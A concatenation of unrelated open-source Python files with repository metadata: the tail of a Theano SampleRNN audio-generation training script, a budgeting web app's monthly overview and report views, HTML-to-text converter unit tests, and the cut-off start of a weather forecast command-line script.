h0.shape: (batch size, N_BIG_RNN, BIG_DIM)
reset.shape: ()
output[0].shape: (batch size, n frames, DIM)
output[1].shape: same as h0.shape
output[2].shape: (batch size, seq len, Q_LEVELS)
"""
frames = input_sequences.reshape((
input_sequences.shape[0],
input_sequences.shape[1] // BIG_FRAME_SIZE,
BIG_FRAME_SIZE
))
# Rescale frames from ints in [0, Q_LEVELS) to floats in [-2, 2]
# (a reasonable range to pass as inputs to the RNN)
frames = (frames.astype('float32') / lib.floatX(Q_LEVELS/2)) - lib.floatX(1)
frames *= lib.floatX(2)
# Initial state of RNNs
learned_h0 = lib.param(
'BigFrameLevel.h0',
numpy.zeros((N_BIG_RNN, H0_MULT*BIG_DIM), dtype=theano.config.floatX)
)
# Handling LEARN_H0
learned_h0.param = LEARN_H0
learned_h0 = T.alloc(learned_h0, h0.shape[0], N_BIG_RNN, H0_MULT*BIG_DIM)
learned_h0 = T.unbroadcast(learned_h0, 0, 1, 2)
h0 = theano.ifelse.ifelse(reset, learned_h0, h0)
# Handling RNN_TYPE
# Handling SKIP_CONN
if RNN_TYPE == 'GRU':
rnns_out, last_hidden = lib.ops.stackedGRU('BigFrameLevel.GRU',
N_BIG_RNN,
BIG_FRAME_SIZE,
BIG_DIM,
frames,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
elif RNN_TYPE == 'LSTM':
rnns_out, last_hidden = lib.ops.stackedLSTM('BigFrameLevel.LSTM',
N_BIG_RNN,
BIG_FRAME_SIZE,
BIG_DIM,
frames,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
output = lib.ops.Linear(
'BigFrameLevel.Output',
BIG_DIM,
DIM * BIG_FRAME_SIZE / FRAME_SIZE,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
output = output.reshape((output.shape[0], output.shape[1] * BIG_FRAME_SIZE / FRAME_SIZE, DIM))
independent_preds = lib.ops.Linear(
'BigFrameLevel.IndependentPreds',
BIG_DIM,
Q_LEVELS * BIG_FRAME_SIZE,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
independent_preds = independent_preds.reshape((independent_preds.shape[0], independent_preds.shape[1] * BIG_FRAME_SIZE, Q_LEVELS))
return (output, last_hidden, independent_preds)
def frame_level_rnn(input_sequences, other_input, h0, reset):
"""
input_sequences.shape: (batch size, n frames * FRAME_SIZE)
other_input.shape: (batch size, n frames, DIM)
h0.shape: (batch size, N_RNN, DIM)
reset.shape: ()
output.shape: (batch size, n frames * FRAME_SIZE, DIM)
"""
frames = input_sequences.reshape((
input_sequences.shape[0],
input_sequences.shape[1] // FRAME_SIZE,
FRAME_SIZE
))
# Rescale frames from ints in [0, Q_LEVELS) to floats in [-2, 2]
# (a reasonable range to pass as inputs to the RNN)
frames = (frames.astype('float32') / lib.floatX(Q_LEVELS/2)) - lib.floatX(1)
frames *= lib.floatX(2)
gru_input = lib.ops.Linear(
'FrameLevel.InputExpand',
FRAME_SIZE,
DIM,
frames,
initialization='he',
weightnorm=WEIGHT_NORM,
) + other_input
# Initial state of RNNs
learned_h0 = lib.param(
'FrameLevel.h0',
numpy.zeros((N_RNN, H0_MULT*DIM), dtype=theano.config.floatX)
)
# Handling LEARN_H0
learned_h0.param = LEARN_H0
learned_h0 = T.alloc(learned_h0, h0.shape[0], N_RNN, H0_MULT*DIM)
learned_h0 = T.unbroadcast(learned_h0, 0, 1, 2)
#learned_h0 = T.patternbroadcast(learned_h0, [False] * learned_h0.ndim)
h0 = theano.ifelse.ifelse(reset, learned_h0, h0)
# Handling RNN_TYPE
# Handling SKIP_CONN
if RNN_TYPE == 'GRU':
rnns_out, last_hidden = lib.ops.stackedGRU('FrameLevel.GRU',
N_RNN,
DIM,
DIM,
gru_input,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
elif RNN_TYPE == 'LSTM':
rnns_out, last_hidden = lib.ops.stackedLSTM('FrameLevel.LSTM',
N_RNN,
DIM,
DIM,
gru_input,
h0=h0,
weightnorm=WEIGHT_NORM,
skip_conn=SKIP_CONN)
output = lib.ops.Linear(
'FrameLevel.Output',
DIM,
FRAME_SIZE * DIM,
rnns_out,
initialization='he',
weightnorm=WEIGHT_NORM
)
output = output.reshape((output.shape[0], output.shape[1] * FRAME_SIZE, DIM))
return (output, last_hidden)
def sample_level_predictor(frame_level_outputs, prev_samples):
"""
frame_level_outputs.shape: (batch size, DIM)
prev_samples.shape: (batch size, FRAME_SIZE)
output.shape: (batch size, Q_LEVELS)
"""
# Handling EMB_SIZE
if EMB_SIZE == 0: # no support for one-hot in three_tier and one_tier.
prev_samples = lib.ops.T_one_hot(prev_samples, Q_LEVELS)
# (BATCH_SIZE*N_FRAMES*FRAME_SIZE, FRAME_SIZE, Q_LEVELS)
last_out_shape = Q_LEVELS
elif EMB_SIZE > 0:
prev_samples = lib.ops.Embedding(
'SampleLevel.Embedding',
Q_LEVELS,
EMB_SIZE,
prev_samples)
# (BATCH_SIZE*N_FRAMES*FRAME_SIZE, FRAME_SIZE, EMB_SIZE), f32
last_out_shape = EMB_SIZE
else:
raise ValueError('EMB_SIZE cannot be negative.')
prev_samples = prev_samples.reshape((-1, FRAME_SIZE * last_out_shape))
out = lib.ops.Linear(
'SampleLevel.L1_PrevSamples',
FRAME_SIZE * last_out_shape,
DIM,
prev_samples,
biases=False,
initialization='he',
weightnorm=WEIGHT_NORM
)
out += frame_level_outputs
# out = T.nnet.relu(out) # commented out to be similar to two_tier
out = lib.ops.Linear('SampleLevel.L2',
DIM,
DIM,
out,
initialization='he',
weightnorm=WEIGHT_NORM)
out = T.nnet.relu(out)
# L3
out = lib.ops.Linear('SampleLevel.L3',
DIM,
DIM,
out,
initialization='he',
weightnorm=WEIGHT_NORM)
out = T.nnet.relu(out)
# Output
# We apply the softmax later
out = lib.ops.Linear('SampleLevel.Output',
DIM,
Q_LEVELS,
out,
weightnorm=WEIGHT_NORM)
return out
sequences = T.imatrix('sequences')
h0 = T.tensor3('h0')
big_h0 = T.tensor3('big_h0')
reset = T.iscalar('reset')
mask = T.matrix('mask')
if args.debug:
# Solely for debugging purposes.
# Maybe I should set the compute_test_value=warn from here.
sequences.tag.test_value = numpy.zeros((BATCH_SIZE, SEQ_LEN+OVERLAP), dtype='int32')
h0.tag.test_value = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
big_h0.tag.test_value = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
reset.tag.test_value = numpy.array(1, dtype='int32')
mask.tag.test_value = numpy.ones((BATCH_SIZE, SEQ_LEN+OVERLAP), dtype='float32')
big_input_sequences = sequences[:, :-BIG_FRAME_SIZE]
input_sequences = sequences[:, BIG_FRAME_SIZE-FRAME_SIZE:-FRAME_SIZE]
target_sequences = sequences[:, BIG_FRAME_SIZE:]
target_mask = mask[:, BIG_FRAME_SIZE:]
big_frame_level_outputs, new_big_h0, big_frame_independent_preds = big_frame_level_rnn(big_input_sequences, big_h0, reset)
frame_level_outputs, new_h0 = frame_level_rnn(input_sequences, big_frame_level_outputs, h0, reset)
prev_samples = sequences[:, BIG_FRAME_SIZE-FRAME_SIZE:-1]
prev_samples = prev_samples.reshape((1, BATCH_SIZE, 1, -1))
prev_samples = T.nnet.neighbours.images2neibs(prev_samples, (1, FRAME_SIZE), neib_step=(1, 1), mode='valid')
prev_samples = prev_samples.reshape((BATCH_SIZE * SEQ_LEN, FRAME_SIZE))
sample_level_outputs = sample_level_predictor(
frame_level_outputs.reshape((BATCH_SIZE * SEQ_LEN, DIM)),
prev_samples
)
cost = T.nnet.categorical_crossentropy(
T.nnet.softmax(sample_level_outputs),
target_sequences.flatten()
)
cost = cost.reshape(target_sequences.shape)
cost = cost * target_mask
# Don't use these lines; could end up with NaN
# Specially at the end of audio files where mask is
# all zero for some of the shorter files in mini-batch.
#cost = cost.sum(axis=1) / target_mask.sum(axis=1)
#cost = cost.mean(axis=0)
# Use this one instead.
cost = cost.sum()
cost = cost / target_mask.sum()
# By default we report cross-entropy cost in bits.
# Switch to nats by commenting out this line:
# log_2(e) = 1.44269504089
cost = cost * lib.floatX(numpy.log2(numpy.e))
ip_cost = lib.floatX(numpy.log2(numpy.e)) * T.nnet.categorical_crossentropy(
T.nnet.softmax(big_frame_independent_preds.reshape((-1, Q_LEVELS))),
target_sequences.flatten()
)
ip_cost = ip_cost.reshape(target_sequences.shape)
ip_cost = ip_cost * target_mask
ip_cost = ip_cost.sum()
ip_cost = ip_cost / target_mask.sum()
### Getting the params, grads, updates, and Theano functions ###
#params = lib.get_params(cost, lambda x: hasattr(x, 'param') and x.param==True)
#ip_params = lib.get_params(ip_cost, lambda x: hasattr(x, 'param') and x.param==True\
# and 'BigFrameLevel' in x.name)
#other_params = [p for p in params if p not in ip_params]
#params = ip_params + other_params
#lib.print_params_info(params, path=FOLDER_PREFIX)
#
#grads = T.grad(cost, wrt=params, disconnected_inputs='warn')
#grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in grads]
#
#updates = lasagne.updates.adam(grads, params, learning_rate=LEARNING_RATE)
###########
all_params = lib.get_params(cost, lambda x: hasattr(x, 'param') and x.param==True)
ip_params = lib.get_params(ip_cost, lambda x: hasattr(x, 'param') and x.param==True\
and 'BigFrameLevel' in x.name)
other_params = [p for p in all_params if p not in ip_params]
all_params = ip_params + other_params
lib.print_params_info(ip_params, path=FOLDER_PREFIX)
lib.print_params_info(other_params, path=FOLDER_PREFIX)
lib.print_params_info(all_params, path=FOLDER_PREFIX)
ip_grads = T.grad(ip_cost, wrt=ip_params, disconnected_inputs='warn')
ip_grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in ip_grads]
other_grads = T.grad(cost, wrt=other_params, disconnected_inputs='warn')
other_grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in other_grads]
grads = T.grad(cost, wrt=all_params, disconnected_inputs='warn')
grads = [T.clip(g, lib.floatX(-GRAD_CLIP), lib.floatX(GRAD_CLIP)) for g in grads]
ip_updates = lasagne.updates.adam(ip_grads, ip_params)
other_updates = lasagne.updates.adam(other_grads, other_params)
updates = lasagne.updates.adam(grads, all_params)
# Training function(s)
ip_train_fn = theano.function(
[sequences, big_h0, reset, mask],
[ip_cost, new_big_h0],
updates=ip_updates,
on_unused_input='warn'
)
other_train_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
updates=other_updates,
on_unused_input='warn'
)
train_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
updates=updates,
on_unused_input='warn'
)
# Validation and Test function, hence no updates
ip_test_fn = theano.function(
[sequences, big_h0, reset, mask],
[ip_cost, new_big_h0],
on_unused_input='warn'
)
other_test_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
on_unused_input='warn'
)
test_fn = theano.function(
[sequences, big_h0, h0, reset, mask],
[cost, new_big_h0, new_h0],
on_unused_input='warn'
)
# Sampling at big frame level
big_frame_level_generate_fn = theano.function(
[sequences, big_h0, reset],
big_frame_level_rnn(sequences, big_h0, reset)[0:2],
on_unused_input='warn'
)
# Sampling at frame level
big_frame_level_outputs = T.matrix('big_frame_level_outputs')
frame_level_generate_fn = theano.function(
[sequences, big_frame_level_outputs, h0, reset],
frame_level_rnn(sequences, big_frame_level_outputs.dimshuffle(0,'x',1), h0, reset),
on_unused_input='warn'
)
# Sampling at audio sample level
frame_level_outputs = T.matrix('frame_level_outputs')
prev_samples = T.imatrix('prev_samples')
sample_level_generate_fn = theano.function(
[frame_level_outputs, prev_samples],
lib.ops.softmax_and_sample(
sample_level_predictor(
frame_level_outputs,
prev_samples
)
),
on_unused_input='warn'
)
# Uniform [-0.5, 0.5) for half of initial state for generated samples
# to study the behaviour of the model and also to introduce some diversity
# to samples in a simple way. [it's disabled]
fixed_rand_h0 = numpy.random.rand(N_SEQS//2, N_RNN, H0_MULT*DIM)
fixed_rand_h0 -= 0.5
fixed_rand_h0 = fixed_rand_h0.astype('float32')
fixed_rand_big_h0 = numpy.random.rand(N_SEQS//2, N_RNN, H0_MULT*DIM)
fixed_rand_big_h0 -= 0.5
fixed_rand_big_h0 = fixed_rand_big_h0.astype('float32')
def generate_and_save_samples(tag):
def write_audio_file(name, data):
data = data.astype('float32')
data -= data.min()
data /= data.max()
data -= 0.5
data *= 0.95
scipy.io.wavfile.write(
os.path.join(SAMPLES_PATH, name+'.wav'),
BITRATE,
data)
total_time = time()
    # Generate N_SEQS sample files, each 5 seconds long
N_SECS = 5
LENGTH = N_SECS*BITRATE if not args.debug else 100
samples = numpy.zeros((N_SEQS, LENGTH), dtype='int32')
samples[:, :BIG_FRAME_SIZE] = Q_ZERO
# First half zero, others fixed random at each checkpoint
big_h0 = numpy.zeros(
(N_SEQS-fixed_rand_big_h0.shape[0], N_BIG_RNN, H0_MULT*BIG_DIM),
dtype='float32'
)
big_h0 = numpy.concatenate((big_h0, fixed_rand_big_h0), axis=0)
h0 = numpy.zeros(
(N_SEQS-fixed_rand_h0.shape[0], N_RNN, H0_MULT*DIM),
dtype='float32'
)
h0 = numpy.concatenate((h0, fixed_rand_h0), axis=0)
big_frame_level_outputs = None
frame_level_outputs = None
for t in xrange(BIG_FRAME_SIZE, LENGTH):
if t % BIG_FRAME_SIZE == 0:
big_frame_level_outputs, big_h0 = big_frame_level_generate_fn(
samples[:, t-BIG_FRAME_SIZE:t],
big_h0,
numpy.int32(t == BIG_FRAME_SIZE)
)
if t % FRAME_SIZE == 0:
frame_level_outputs, h0 = frame_level_generate_fn(
samples[:, t-FRAME_SIZE:t],
big_frame_level_outputs[:, (t / FRAME_SIZE) % (BIG_FRAME_SIZE / FRAME_SIZE)],
h0,
numpy.int32(t == BIG_FRAME_SIZE)
)
samples[:, t] = sample_level_generate_fn(
frame_level_outputs[:, t % FRAME_SIZE],
samples[:, t-FRAME_SIZE:t]
)
total_time = time() - total_time
log = "{} samples of {} seconds length generated in {} seconds."
log = log.format(N_SEQS, N_SECS, total_time)
print log,
for i in xrange(N_SEQS):
samp = samples[i]
if Q_TYPE == 'mu-law':
from datasets.dataset import mu2linear
samp = mu2linear(samp)
elif Q_TYPE == 'a-law':
raise NotImplementedError('a-law is not implemented')
write_audio_file("sample_{}_{}".format(tag, i), samp)
def monitor(data_feeder):
"""
Cost and time of test_fn on a given dataset section.
Pass only one of `valid_feeder` or `test_feeder`.
Don't pass `train_feed`.
:returns:
Mean cost over the input dataset (data_feeder)
Total time spent
"""
_total_time = time()
_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
_big_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
_costs = []
_data_feeder = load_data(data_feeder)
for _seqs, _reset, _mask in _data_feeder:
_cost, _big_h0, _h0 = test_fn(_seqs, _big_h0, _h0, _reset, _mask)
_costs.append(_cost)
return numpy.mean(_costs), time() - _total_time
print "Wall clock time spent before training started: {:.2f}h"\
.format((time()-exp_start)/3600.)
print "Training!"
total_iters = 0
total_time = 0.
last_print_time = 0.
last_print_iters = 0
costs = []
lowest_valid_cost = numpy.finfo(numpy.float32).max
corresponding_test_cost = numpy.finfo(numpy.float32).max
new_lowest_cost = False
end_of_batch = False
epoch = 0
h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*DIM), dtype='float32')
big_h0 = numpy.zeros((BATCH_SIZE, N_RNN, H0_MULT*BIG_DIM), dtype='float32')
# Initial load train dataset
tr_feeder = load_data(train_feeder)
### Handling the resume option:
if RESUME:
# Check if checkpoint from previous run is not corrupted.
# Then overwrite some of the variables above.
iters_to_consume, res_path, epoch, total_iters,\
[lowest_valid_cost, corresponding_test_cost, test_cost] = \
lib.resumable(path=FOLDER_PREFIX,
iter_key=iter_str,
epoch_key=epoch_str,
add_resume_counter=True,
other_keys=[lowest_valid_str,
corresp_test_str,
test_nll_str])
# At this point we saved the pkl file.
last_print_iters = total_iters
print "### RESUMING JOB FROM EPOCH {}, ITER {}".format(epoch, total_iters)
# Consumes this much iters to get to the last point in training data.
consume_time = time()
for i in xrange(iters_to_consume):
tr_feeder.next()
consume_time = time() - consume_time
print "Train data ready in {:.2f}secs after consuming {} minibatches.".\
format(consume_time, iters_to_consume)
lib.load_params(res_path)
print "Parameters from last available checkpoint loaded."
while True:
# THIS IS ONE ITERATION
if total_iters % 500 == 0:
print total_iters,
total_iters += 1
try:
# Take as many mini-batches as possible from train set
mini_batch = tr_feeder.next()
except StopIteration:
# Mini-batches are finished. Load it again.
# Basically, one epoch.
tr_feeder = load_data(train_feeder)
# and start taking new mini-batches again.
mini_batch = tr_feeder.next()
epoch += 1
end_of_batch = True
print "[Another epoch]",
seqs, reset, mask = mini_batch
start_time = time()
cost, big_h0, h0 = train_fn(seqs, big_h0, h0, reset, mask)
total_time += time() - start_time
#print "This cost:", cost, "This h0.mean()", h0.mean()
costs.append(cost)
# Monitoring step
if (TRAIN_MODE=='iters' and total_iters-last_print_iters == PRINT_ITERS) or \
(TRAIN_MODE=='time' and total_time-last_print_time >= PRINT_TIME) or \
(TRAIN_MODE=='time-iters' and total_time-last_print_time >= PRINT_TIME) or \
(TRAIN_MODE=='iters-time' and total_iters-last_print_iters >= PRINT_ITERS) or \
end_of_batch:
# 0. Validation
print "\nValidation!",
valid_cost, valid_time = monitor(valid_feeder)
print "Done!"
# 1. Test
test_time = 0.
# Only when the validation cost is improved get the cost for test set.
if valid_cost < lowest_valid_cost:
lowest_valid_cost = valid_cost
print "\n>>> Best validation cost of {} reached. Testing!"\
.format(valid_cost),
test_cost, test_time = monitor(test_feeder)
print "Done!"
# Report last one which is the lowest on validation set:
print ">>> test cost:{}\ttotal time:{}".format(test_cost, test_time)
corresponding_test_cost = test_cost
new_lowest_cost = True
# 2. Stdout the training progress
print_info = "epoch:{}\ttotal iters:{}\twall clock time:{:.2f}h\n"
print_info += ">>> Lowest valid cost:{}\t Corresponding test cost:{}\n"
print_info += "\ttrain cost:{:.4f}\ttotal time:{:.2f}h\tper iter:{:.3f}s\n"
print_info += "\tvalid cost:{:.4f}\ttotal time:{:.2f}h\n"
print_info += "\ttest cost:{:.4f}\ttotal time:{:.2f}h"
print_info = print_info.format(epoch,
total_iters,
(time()-exp_start)/3600,
lowest_valid_cost,
corresponding_test_cost,
numpy.mean(costs),
total_time/3600,
total_time/total_iters,
valid_cost,
valid_time/3600,
test_cost,
test_time/3600)
print print_info
tag = "e{}_i{}_t{:.2f}_tr{:.4f}_v{:.4f}"
tag = tag.format(epoch,
total_iters,
total_time/3600,
numpy.mean(cost),
valid_cost)
tag += ("_best" if new_lowest_cost else "")
# 3. Save params of model (IO bound, time consuming)
# If saving params is not successful, there shouldn't be any trace of
# successful monitoring step in train_log as well.
print "Saving params!",
lib.save_params(
os.path.join(PARAMS_PATH, 'params_{}.pkl'.format(tag))
)
print "Done!"
# 4. Save and graph training progress (fast)
training_info = {epoch_str : epoch,
iter_str : total_iters,
train_nll_str : numpy.mean(costs),
valid_nll_str : valid_cost,
test_nll_str : test_cost,
lowest_valid_str : lowest_valid_cost,
corresp_test_str : corresponding_test_cost,
'train time' : total_time,
'valid time' : valid_time,
'test time' : test_time,
'wall clock time' : time()-exp_start}
lib.save_training_info(training_info, FOLDER_PREFIX)
print "Train info saved!",
y_axis_strs = [train_nll_str, valid_nll_str, test_nll_str]
lib.plot_traing_info(iter_str, y_axis_strs, FOLDER_PREFIX)
print "And plotted!"
# 5. Generate and save samples (time consuming)
# If not successful, we still have the params to sample afterward
print "Sampling!",
# Generate samples
generate_and_save_samples(tag)
print "Done!"
if total_iters-last_print_iters == PRINT_ITERS \
or total_time-last_print_time >= PRINT_TIME:
# If we are here b/c of onom_end_of_batch, we shouldn't mess
# with costs and last_print_iters
costs = []
last_print_time += PRINT_TIME
last_print_iters += PRINT_ITERS
end_of_batch = False
new_lowest_cost = False
print "Validation Done!\nBack to Training..."
if (TRAIN_MODE=='iters' and total_iters == STOP_ITERS) or \
(TRAIN_MODE=='time' and total_time >= STOP_TIME) or \
((TRAIN_MODE=='time-iters' or TRAIN_MODE=='iters-time') and \
(total_iters == STOP_ITERS or total_time >= STOP_TIME)):
print "Done! Total iters:", total_iters, "Total time: ", total_time
print "Experiment ended at:", datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M')
print "Wall clock time spent: {:.2f}h"\
.format((time()-exp_start)/3600)
sys.exit()
| mit | -2,786,688,481,508,566,500 | 37.406452 | 148 | 0.59379 | false |
RosesTheN00b/BudgetButlerWeb | butler_offline/views/einzelbuchungen/uebersicht_monat.py | 1 | 8451 | from butler_offline.viewcore.state import persisted_state
from butler_offline.core import time
from butler_offline.viewcore import request_handler
from butler_offline.viewcore import viewcore
from butler_offline.core.report import ReportGenerator
from butler_offline.viewcore.converter import datum_to_string
def _handle_request(request):
context = viewcore.generate_base_context('monatsuebersicht')
einzelbuchungen = persisted_state.database_instance().einzelbuchungen
monate = sorted(einzelbuchungen.get_monate(), reverse=True)
context['monate'] = monate
if not monate:
return viewcore.generate_error_context('monatsuebersicht', 'Keine Ausgaben erfasst')
selected_item = context['monate'][0]
if request.method == "POST":
selected_item = request.values['date']
month = int(float(selected_item.split("_")[1]))
year = int(float(selected_item.split("_")[0]))
table_data_selection = einzelbuchungen.select().select_month(month).select_year(year)
table_ausgaben = table_data_selection.select_ausgaben()
table_einnahmen = table_data_selection.select_einnahmen()
'''
    Calculation of the expenses for the pie chart
'''
ausgaben_liste = []
ausgaben_labels = []
ausgaben_data = []
ausgaben_colors = []
for kategorie, row in table_ausgaben.group_by_kategorie().iterrows():
ausgaben_labels.append(kategorie)
ausgaben_data.append("%.2f" % abs(row.Wert))
ausgaben_colors.append("#" + einzelbuchungen.get_farbe_fuer(kategorie))
ausgaben_liste.append((kategorie, "%.2f" % row.Wert, einzelbuchungen.get_farbe_fuer(kategorie)))
context['ausgaben'] = ausgaben_liste
context['ausgaben_labels'] = ausgaben_labels
context['ausgaben_data'] = ausgaben_data
context['ausgaben_colors'] = ausgaben_colors
'''
    Calculation of the income for the pie chart
'''
einnahmen_liste = []
einnahmen_labels = []
einnahmen_data = []
einnahmen_colors = []
for kategorie, row in table_einnahmen.group_by_kategorie().iterrows():
einnahmen_labels.append(kategorie)
einnahmen_data.append("%.2f" % abs(row.Wert))
einnahmen_colors.append("#" + einzelbuchungen.get_farbe_fuer(kategorie))
einnahmen_liste.append((kategorie, "%.2f" % row.Wert, einzelbuchungen.get_farbe_fuer(kategorie)))
context['einnahmen'] = einnahmen_liste
context['einnahmen_labels'] = einnahmen_labels
context['einnahmen_data'] = einnahmen_data
context['einnahmen_colors'] = einnahmen_colors
zusammenfassung = table_data_selection.get_month_summary()
for tag, kategorien_liste in zusammenfassung:
for einheit in kategorien_liste:
einheit['farbe'] = einzelbuchungen.get_farbe_fuer(einheit['kategorie'])
context['zusammenfassung'] = zusammenfassung
ausgaben_monat = table_ausgaben.sum()
context['gesamt'] = "%.2f" % ausgaben_monat
einnahmen_monat = table_einnahmen.sum()
context['gesamt_einnahmen'] = "%.2f" % einnahmen_monat
selected_date = str(year) + "_" + str(month).rjust(2, "0")
context['selected_date'] = selected_date
context['selected_year'] = year
if einnahmen_monat >= abs(ausgaben_monat):
context['color_uebersicht_gruppe_1'] = "gray"
context['name_uebersicht_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_gruppe_1'] = '%.2f' % abs(ausgaben_monat)
context['color_uebersicht_gruppe_2'] = "lightgreen"
context['name_uebersicht_gruppe_2'] = 'Einnahmenüberschuss'
context['wert_uebersicht_gruppe_2'] = '%.2f' % (einnahmen_monat + ausgaben_monat)
else:
context['color_uebersicht_gruppe_1'] = "gray"
context['name_uebersicht_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_gruppe_1'] = '%.2f' % einnahmen_monat
context['color_uebersicht_gruppe_2'] = "red"
context['name_uebersicht_gruppe_2'] = 'Ungedeckte Ausgaben'
context['wert_uebersicht_gruppe_2'] = '%.2f' % ((ausgaben_monat + einnahmen_monat) * -1)
einnahmen_jahr = einzelbuchungen.select().select_einnahmen().select_year(year).sum()
ausgaben_jahr = einzelbuchungen.select().select_ausgaben().select_year(year).sum()
if einnahmen_jahr >= abs(ausgaben_jahr):
context['color_uebersicht_jahr_gruppe_1'] = "gray"
        context['name_uebersicht_jahr_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_1'] = '%.2f' % abs(ausgaben_jahr)
context['color_uebersicht_jahr_gruppe_2'] = "lightgreen"
context['name_uebersicht_jahr_gruppe_2'] = 'Einnahmenüberschuss'
context['wert_uebersicht_jahr_gruppe_2'] = '%.2f' % (einnahmen_jahr + ausgaben_jahr)
else:
context['color_uebersicht_jahr_gruppe_1'] = "gray"
context['name_uebersicht_jahr_gruppe_1'] = 'Gedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_1'] = '%.2f' % einnahmen_jahr
context['color_uebersicht_jahr_gruppe_2'] = "red"
context['name_uebersicht_jahr_gruppe_2'] = 'Ungedeckte Ausgaben'
context['wert_uebersicht_jahr_gruppe_2'] = '%.2f' % ((ausgaben_jahr + einnahmen_jahr) * -1)
return context
def index(request):
return request_handler.handle_request(request, _handle_request, 'einzelbuchungen/uebersicht_monat.html')
def _abrechnen(request):
context = viewcore.generate_base_context('monatsuebersicht')
date = time.today()
year = date.year
month = date.month
quantity = 60
if request.method == 'POST':
if 'date' in request.values:
str_year, str_month = request.values['date'].split('_')
year = int(str_year)
month = int(str_month)
if 'quantity' in request.values:
quantity = int(request.values['quantity'])
einzelbuchungen = persisted_state.database_instance().einzelbuchungen
generator = ReportGenerator('Monatsübersicht für ' + str(month) + '/' + str(year), quantity)
table_data_selection = einzelbuchungen.select().select_month(month).select_year(year)
table_ausgaben = table_data_selection.select_ausgaben()
table_einnahmen = table_data_selection.select_einnahmen()
if _is_selected(request, 'zusammenfassung_einnahmen'):
data = {}
for kategorie, row in table_einnahmen.group_by_kategorie().iterrows():
data[kategorie] = row.Wert
generator.add_half_line_elements({'Einnahmen': data})
if _is_selected(request, 'zusammenfassung_ausgaben'):
data = {}
for kategorie, row in table_ausgaben.group_by_kategorie().iterrows():
data[kategorie] = row.Wert
generator.add_half_line_elements({'Ausgaben': data})
if _is_selected(request, 'einnahmen'):
generator.add_halfline('')
generator.add_halfline('')
generator.add_halfline('----Einnahmen----')
zusammenfassung = table_einnahmen.zusammenfassung()
compiled_zusammenfassung = {}
for tag, kategorien_liste in zusammenfassung:
compiled_zusammenfassung[datum_to_string(tag)] = {}
for einheit in kategorien_liste:
compiled_zusammenfassung[datum_to_string(tag)][einheit['name']] = float(einheit['summe'])
generator.add_half_line_elements(compiled_zusammenfassung)
if _is_selected(request, 'ausgaben'):
generator.add_halfline('')
generator.add_halfline('')
generator.add_halfline('----Ausgaben----')
zusammenfassung = table_ausgaben.zusammenfassung()
compiled_zusammenfassung = {}
for tag, kategorien_liste in zusammenfassung:
compiled_zusammenfassung[datum_to_string(tag)] = {}
for einheit in kategorien_liste:
compiled_zusammenfassung[datum_to_string(tag)][einheit['name']] = float(einheit['summe'])
generator.add_half_line_elements(compiled_zusammenfassung)
page = ''
for line in generator.generate_pages():
page = page + '<br>' + line
context['abrechnungstext'] = '<pre>' + page + '</pre>'
context['element_titel'] = 'Abrechnung vom {month}/{year}'.format(month=month, year=year)
return context
def _is_selected(request, name):
if request.method != 'POST':
return True
if name in request.values:
return True
return False
def abrechnen(request):
return request_handler.handle_request(request, _abrechnen, 'shared/present_abrechnung.html')
| agpl-3.0 | -3,474,251,232,784,731,600 | 41.437186 | 108 | 0.665483 | false |
Aplopio/document-converter | converters/tests/test_html_txt.py | 1 | 1301 | import sys
sys.path.append('..')
sys.path.append('../..')
import unittest
from html_txt import HtmlTxt
from file_manager import FileManager
class HtmlTxtTests(unittest.TestCase):
def test2_htmltxt1(self):
file1 = FileManager('test_files/test1.html')
file2 = FileManager('test_files/test2.html')
file3 = FileManager('test_files/test3.html')
file4 = FileManager('test_files/test4.html')
test = HtmlTxt([file1, file2, file3, file4])
test.convert()
self.failUnless(open('test_files/test1.txt'))
self.failUnless(open('test_files/test2.txt'))
self.failUnless(open('test_files/test3.txt'))
self.failUnless(open('test_files/test4.txt'))
def test2_htmltxt2(self):
file1 = FileManager('test_files/test1.html', '.')
file2 = FileManager('test_files/test2.html', '.')
file3 = FileManager('test_files/test3.html', '.')
file4 = FileManager('test_files/test4.html', '.')
test = HtmlTxt([file1, file2, file3, file4])
test.convert()
self.failUnless(open('test1.txt'))
self.failUnless(open('test2.txt'))
self.failUnless(open('test3.txt'))
self.failUnless(open('test4.txt'))
def main():
unittest.main()
if __name__ == '__main__':
main()
| mit | -8,331,685,878,504,589,000 | 30.731707 | 57 | 0.623367 | false |
schmodd/forecast.py | forecast.py | 1 | 4251 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# todo: add alerts, colors
import requests
import json
import datetime
import argparse
import sys
from prettytable import PrettyTable
# surf to https://developer.forecast.io/ for an api key
# use http://dbsgeo.com/latlon/ to get coordinates for your location
API_KEY=''
LAT=''
LONG=''
LIMIT=24 # limit hourly forecast output (48 max)
#some api settings
UNITS='si' # auto possibly shows wrong measuring unit
LANG='en'
def formatDatetime(unixTime, outputFormat='%d. %b. %H:%M'):
return datetime.datetime.fromtimestamp(unixTime).strftime(outputFormat)
def getMeasuringUnit():
